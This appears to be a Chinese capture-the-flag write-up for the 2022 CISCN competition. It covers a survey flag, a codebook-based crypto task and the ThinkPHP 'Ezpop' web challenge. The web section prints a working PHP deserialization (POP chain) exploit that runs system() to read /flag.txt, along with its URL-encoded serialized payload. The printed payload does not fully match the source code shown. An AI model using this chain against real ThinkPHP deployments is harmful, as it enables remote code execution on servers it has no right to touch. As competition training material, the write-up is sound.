【WP】FIFTEENTH CISCN (PART)

【WP】FIFTEENTH CISCN (PART)

五月 29, 2022

Misc

4. 调查问卷

  • flag值:flag{Thanksforplayingourgames}

Crypto

1. 签到电台

此题与摩斯电码关系不大

  1. 输入···启动后BurpSuit抓个包

  2. 可以直接进行url?msg=xxxx传递

  3. 前往公众号获取提示

    791b051d1069024a94daeb6088ae9d85.png

  4. 按照网址提供的密码本前28位,与7个电码逐位相加mod10

    11d9f4b5684c6db2c80405469cd555e7.png

  5. 回到repeater,得到flag

    d371e53295e989db066669aa100f4d76.png

  • flag:flag{2adc3f3c-0264-4bb5-bea4-fec4d788bb23}

    Web

    4. Ezpop

  • thinkphp 框架

  1. 发现网址目录下有源码/www.zip,下载下来分析

  2. 根据/public/index.php源码和注释提示构造 payload

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    <?php
    namespace think{
        abstract class Model{
            private $lazySave = false;
            private $data = [];
            private $exists = false;
            protected $table;
            private $withAttr = [];
            protected $json = [];
            protected $jsonAssoc = false;
            function __construct($obj = ''){
                $this->lazySave = True;
                $this->data = ['whoami' => ['cat${IFS}/flag.txt']];
                $this->exists = True;
                $this->table = $obj;
                $this->withAttr = ['whoami' => ['system']];
                $this->json = ['whoami',['whoami']];
                $this->jsonAssoc = True;
            }
        }
    }
    namespace think\model{
        use think\Model;
        class Pivot extends Model{
        }
    }
    namespace{
        echo(urlencode(serialize(new think\model\Pivot(new think\model\Pivot()))));
    }

  3. 运行一下php代码得到

    1
    O%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3Bs%3A0%3A%22%22%3Bs%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3Bi%3A1%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3Bi%3A1%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7D

  4. POST方式提交到/index.php/index/test得到flag

    09b19555a94fb43eed78855b59ef272c.png

  • flag: flag{85d52d33-9e9b-42a7-9970-fbe62641acf3}
  1. 1. Misc
    1. 1.1. 4. 调查问卷
  2. 2. Crypto
    1. 2.1. 1. 签到电台
  3. 3. Web
    1. 3.1. 4. Ezpop